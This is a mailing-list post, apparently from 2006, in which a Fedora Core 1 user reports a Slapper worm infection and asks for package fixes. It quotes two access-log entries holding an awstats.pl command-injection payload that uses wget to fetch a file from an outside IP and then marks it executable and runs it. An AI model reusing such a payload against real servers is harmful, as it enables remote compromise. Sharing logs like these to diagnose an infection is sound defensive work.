slapper worm

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



Hi guys,

I have an FC1 machine which got infected twice with the slapper worm, and then
started DOS attacking a large vendor.

I've stopped slapper in its tracks with a couple of changes to FC1, but in
analysing now how it got in (it seems to use SSLv2 vulerabilities in an apache
SSL server which I've now turned off), I see the following bit of interest in
my apache access_log:

220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] "GET
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
 HTTP/1.1"
 403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET
/cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
 HTTP/1.1"
 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

These "scripz" files end up going into /tmp, being compiled with gcc, renamed
to "httpd" and run as that.

I'm using:

perl-5.8.3-17.4.legacy
httpd-2.0.51-1.9.legacy
openssl-0.9.7a-33.13.legacy

Are there any updates FL can do to any of the packages to fix/block slapper
from an FC1 machine?

Michael.

--

fedora-legacy-list@xxxxxxxxxx
https://www.redhat.com/mailman/listinfo/fedora-legacy-list

[Index of Archives]     [Fedora Development]     [Fedora Announce]     [Fedora Legacy Announce]     [Fedora Config]     [PAM]     [Fedora General Discussion]     [Big List of Linux Books]     [Gimp]     [Yosemite Questions]

  Powered by Linux